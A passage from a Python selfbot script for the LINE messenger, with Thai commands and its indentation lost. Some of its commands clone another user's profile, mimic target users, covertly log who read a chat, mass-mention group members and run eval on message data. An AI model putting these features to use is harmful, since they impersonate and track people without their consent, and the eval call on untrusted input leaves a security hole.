if settings["autoAdd"] == True: ret_ += "\nออโต้บล็อค ↹ เปิด"
else: ret_ += "\nออโต้บล็อค ↹ ปิด"
ret_ += "\n"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif text.lower() == 'บล็อคเปิด':
settings["autoAdd"] = True
line.sendMessage(to, "ออโต้บล็อค ★ เปิด")
elif text.lower() == 'บล็อคปิด':
settings["autoAdd"] = False
line.sendMessage(to, "ออโต้บล็อค ★ ปิด")
elif text.lower() == 'เข้าเปิด':
settings["autoJoin"] = True
line.sendMessage(to, "เข้ารวมกลุ่่มออโต้ ★ เปิด")
elif text.lower() == 'เข้าปิด':
settings["autoJoin"] = False
line.sendMessage(to, "เข้ารวมกลุ่มออโต้ ★ ปิด")
elif text.lower() == 'แชทรวมเปิด':
settings["autoLeave"] = True
line.sendMessage(to, "ออกจากแชทรวม ออโต้ ★ เปิด")
elif text.lower() == 'แชทรวมปิด':
settings["autoLeave"] = False
line.sendMessage(to, "ออกจากแชทรวม ออโต้ ★ ปิด")
elif text.lower() == 'อ่านเปิด':
settings["autoRead"] = True
line.sendMessage(to, "ระบบอ่านและตรวจจับออโต้ ★ เปิด")
elif text.lower() == 'อ่านปิด':
settings["autoRead"] = False
line.sendMessage(to, "ระบบอ่านและตรวจจับออโต้ ★ ปิด")
elif text.lower() == 'เช็คติ้กเปิด':
settings["checkSticker"] = True
line.sendMessage(to, "เปิดการเช็คระบบ ตรวจสอบ สติ้กเกอร์ ★ เปิด")
elif text.lower() == 'เช็คติ้กปิด':
settings["checkSticker"] = False
line.sendMessage(to, "ปิดการเช็คระบบ ตรวจสอบ สติ้กเกอร์ ★ ปิด")
#==============================================================================#
elif text.lower() == 'me':
sendMessageWithMention(to, lineMID)
line.sendContact(to, lineMID)
elif text.lower() == 'ไอดี':
line.sendMessage(msg.to,"Mid ✪ " + lineMID)
elif text.lower() == 'ชื่อ':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"ชื่อ ✪ n" + me.displayName)
elif text.lower() == 'ตัส':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"ข้อความ&ตัส ✪ \n" + me.statusMessage)
elif text.lower() == 'รูป':
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'รูปวิดีโอ':
me = line.getContact(lineMID)
line.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus + "/vp")
elif text.lower() == 'รูปปก':
me = line.getContact(lineMID)
cover = line.getProfileCoverURL(lineMID)
line.sendImageWithURL(msg.to, cover)
elif msg.text.lower().startswith("คท "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(msg.to, mi_d)
elif msg.text.lower().startswith("ไอดี "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
ret_ = "[ Mid User ]"
for ls in lists:
ret_ += "\n{}" + ls
line.sendMessage(msg.to, str(ret_))
elif msg.text.lower().startswith("ชื่อ "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "⊄ \n" + contact.displayName)
elif msg.text.lower().startswith("ตัส "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "⊄ \n{}" + contact.statusMessage)
elif msg.text.lower().startswith("รูป "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("video "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus + "/vp"
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("ปก "):
if line != None:
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = line.getProfileCoverURL(ls)
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("copy "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
contact = mention["M"]
break
try:
line.cloneContactProfile(contact)
line.sendMessage(msg.to, "ลงคำสั่งคัดลอกใหม่")
except:
line.sendMessage(msg.to, "คัดลอก ∾ เรียบร้อย")
elif text.lower() == 'คืนร่าง':
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
line.updateProfileAttribute(8, lineProfile.pictureStatus)
line.updateProfile(lineProfile)
line.sendMessage(msg.to, "≟")
except:
line.sendMessage(msg.to, "≟")
#==============================================================================#
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
settings["autoCancel"]["on"] = False
if settings["lang"] == "JP":
line.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
line.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
settings["autoCancel"]["on"] = True
if settings["lang"] == "JP":
line.sendText(msg.to,strnum + " สมาชิกในกลุ่มจะปฏิเสธคำเชิญโดยอัตโนมัติ")
else:
line.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if settings["lang"] == "JP":
line.sendText(msg.to,"ค่าไม่ถูกต้อง")
else:
line.sendText(msg.to,"การจัดอันดับที่แปลกประหลาด")
elif msg.text.lower().startswith("เลียนแบบ "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
settings["mimic"]["target"][target] = True
line.sendMessage(msg.to,"เลียนแบบถูกเพิ่ม")
break
except:
line.sendMessage(msg.to,"ล้มเหลว")
break
elif msg.text.lower().startswith("เลียนแบบลบ "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["mimic"]["target"][target]
line.sendMessage(msg.to,"เลียบแบบลบ")
break
except:
line.sendMessage(msg.to,"ล้มเหลว")
break
elif text.lower() == 'เช็คเลียนแบบ':
if settings["mimic"]["target"] == {}:
line.sendMessage(msg.to,"Tidak Ada Target")
else:
mc = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
for mi_d in settings["mimic"]["target"]:
mc += "\n "+line.getContact(mi_d).displayName
line.sendMessage(msg.to,mc + "\n Ŧ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
elif "mimic" in msg.text.lower():
sep = text.split(" ")
mic = text.replace(sep[0] + " ","")
if mic == "on":
if settings["mimic"]["status"] == False:
settings["mimic"]["status"] = True
line.sendMessage(msg.to,"Mimic enabled.")
elif mic == "off":
if settings["mimic"]["status"] == True:
settings["mimic"]["status"] = False
line.sendMessage(msg.to,"Mimic disabled.")
#==============================================================================#
elif text.lower() == 'เช็คแอด':
group = line.getGroup(to)
GS = group.creator.mid
line.sendContact(to, GS)
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elif text.lower() == 'ไอดีกลุ่ม':
gid = line.getGroup(to)
line.sendMessage(to, "→ 〄 " + gid.id + " ←")
elif text.lower() == 'รูปกลุ่ม':
group = line.getGroup(to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
line.sendImageWithURL(to, path)
elif text.lower() == 'ชื่อกลุ่ม':
gid = line.getGroup(to)
line.sendMessage(to, "→ " + gid.name + " ←")
elif text.lower() == 'ขอลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(to)
line.sendMessage(to, "นี้คือ QR ของกลุ่มนี้ สามารถนำปใช้ได้เลย \nhttps://line.me/R/ti/g/{}".format(str(ticket)))
elif text.lower() == 'เปิดลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
line.sendMessage(to, "เปิดอยู่กรุณา สั่งคำว่า ของลิ้งค์")
else:
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, "เปิดQRกลุ่มเป็นอันที่เรียบร้อย")
elif text.lower() == 'ปิดลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == True:
line.sendMessage(to, "ปิดอยุ่อ่ะจะปิดไรอีกละ")
else:
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, "OK ﻬ QR ปิดละ")
elif text.lower() == 'ข้อมูลห้อง':
group = line.getGroup(to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Tidak ditemukan"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(line.reissueGroupTicket(group.id)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\nชื่อกลุ่ม ⋙ {}".format(str(group.name))
ret_ += "\nGidกลุ่ม ⋙ {}".format(group.id)
ret_ += "\nผู้สร้างกลุ่ม ⋙ {}".format(str(gCreator))
ret_ += "\nจำนวนสมาชิก ⋙ {}".format(str(len(group.members)))
ret_ += "\nสมาชิกค้างเชิญ ⋙ {}".format(gPending)
ret_ += "\nQR ของกลุ่ม ⋙ ".format(gQr)
ret_ += "\n ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
line.sendMessage(to, str(ret_))
line.sendImageWithURL(to, path)
elif text.lower() == 'สมาชิก':
if msg.toType == 2:
group = line.getGroup(to)
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for mem in group.members:
ret_ += "\n↜ ↝ {}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n ↠ จำนวน {} คน ↞ ".format(str(len(group.members)))
line.sendMessage(to, str(ret_))
elif text.lower() == 'กลุ่ม':
groups = line.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = line.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม ".format(str(len(groups)))
line.sendMessage(to, str(ret_))
elif text.lower() == '1กลุ่ม':
groups = ki.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = ki.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม ".format(str(len(groups)))
ki.sendMessage(to, str(ret_))
elif text.lower() == '2กลุ่ม':
groups = kk.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = kk.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม".format(str(len(groups)))
kk.sendMessage(to, str(ret_))
elif text.lower() == '3กลุ่ม':
groups = kc.groups
ret_ = "╔══[ Group List ]"
no = 0 + 1
for gid in groups:
group = kc.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม".format(str(len(groups)))
kc.sendMessage(to, str(ret_))
#==============================================================================#
#==============================================================================#
elif text.lower() == 'แท็ก':
if msg.toType == 0:
sendMention(to, to, "", "")
elif msg.toType == 2:
group = line.getGroup(to)
contact = [mem.mid for mem in group.members]
ct1, ct2, ct3, ct4, ct5, jml = [], [], [], [], [], len(contact)
if jml <= 100:
mentionMembers(to, contact)
elif jml > 100 and jml <= 200:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, jml):
ct2 += [contact[b]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
elif jml > 200 and jml <= 300:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, jml):
ct3 += [contact[c]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
elif jml > 300 and jml <= 400:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, 299):
ct3 += [contact[c]]
for d in range(300, jml):
ct4 += [contact[d]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
mentionMembers(to, ct4)
elif jml > 400 and jml <= 500:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, 299):
ct3 += [contact[c]]
for d in range(300, 399):
ct4 += [contact[d]]
for e in range(400, jml):
ct4 += [contact[e]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
mentionMembers(to, ct4)
mentionMembers(to, ct5)
#===================================================================#
elif text.lower() == 'เช็ค':
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิตย์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nเวลา [ " + timeNow.strftime('%H:%M:%S') + " ]"
if msg.to in read['readPoint']:
try:
del read['readPoint'][msg.to]
del read['readMember'][msg.to]
del read['readTime'][msg.to]
except:
pass
read['readPoint'][msg.to] = msg.id
read['readMember'][msg.to] = ""
read['readTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
read['ROM'][msg.to] = {}
with open('read.json', 'w') as fp:
json.dump(read, fp, sort_keys=True, indent=4)
line.sendMessage(msg.to,"Lurking enabled")
else:
try:
del read['readPoint'][msg.to]
del read['readMember'][msg.to]
del read['readTime'][msg.to]
except:
pass
read['readPoint'][msg.to] = msg.id
read['readMember'][msg.to] = ""
read['readTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
read['ROM'][msg.to] = {}
with open('read.json', 'w') as fp:
json.dump(read, fp, sort_keys=True, indent=4)
line.sendMessage(msg.to, "เริ่มตรวจจับรายชื่อคนอ่านแบบแท็ก\n" + readTime)
elif text.lower() == 'อ่าน':
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิตย์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nเวลา [ " + timeNow.strftime('%H:%M:%S') + " ]"
if receiver in read['readPoint']:
if list(read["ROM"][receiver].items()) == []:
line.sendMessage(receiver,"รายชื่อคนที่อ่าน \nNone")
else:
chiya = []
for rom in list(read["ROM"][receiver].items()):
chiya.append(rom[1])
cmem = line.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'รายชื่อคนที่อ่าน \n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@c\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+ zxc + "\nเวลาที่อ่าน \n" + readTime
try:
line.sendMessage(receiver, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as error:
print (error)
pass
else:
line.sendMessage(receiver,"สั่งเช็คใหม่แล้วสั่งอ่านใหม่อีกรอบ \n ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elif msg.text.lower().startswith("tr-af "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='af')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sq "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sq')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-am "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='am')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ar "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-az "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='az')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-eu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='eu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-be "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='be')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bs "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bs')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ca "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ca')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ceb "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ceb')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ny "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ny')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-cn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-cn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-tw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-tw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-co "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='co')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cs "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cs')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-da "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='da')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-nl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='nl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-en "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-et "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='et')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ka "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ka')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-de "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='de')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-el "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='el')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ht "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ht')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ha "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ha')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-haw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='haw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-iw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='iw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hmn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hmn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-is "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='is')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ig "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ig')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-id "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ga "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ga')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-it "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='it')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ja "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-jw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-km "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='km')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ko "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ku "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ku')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ky "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ky')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lo "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lo')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-la "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='la')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lv "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lv')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lt "):
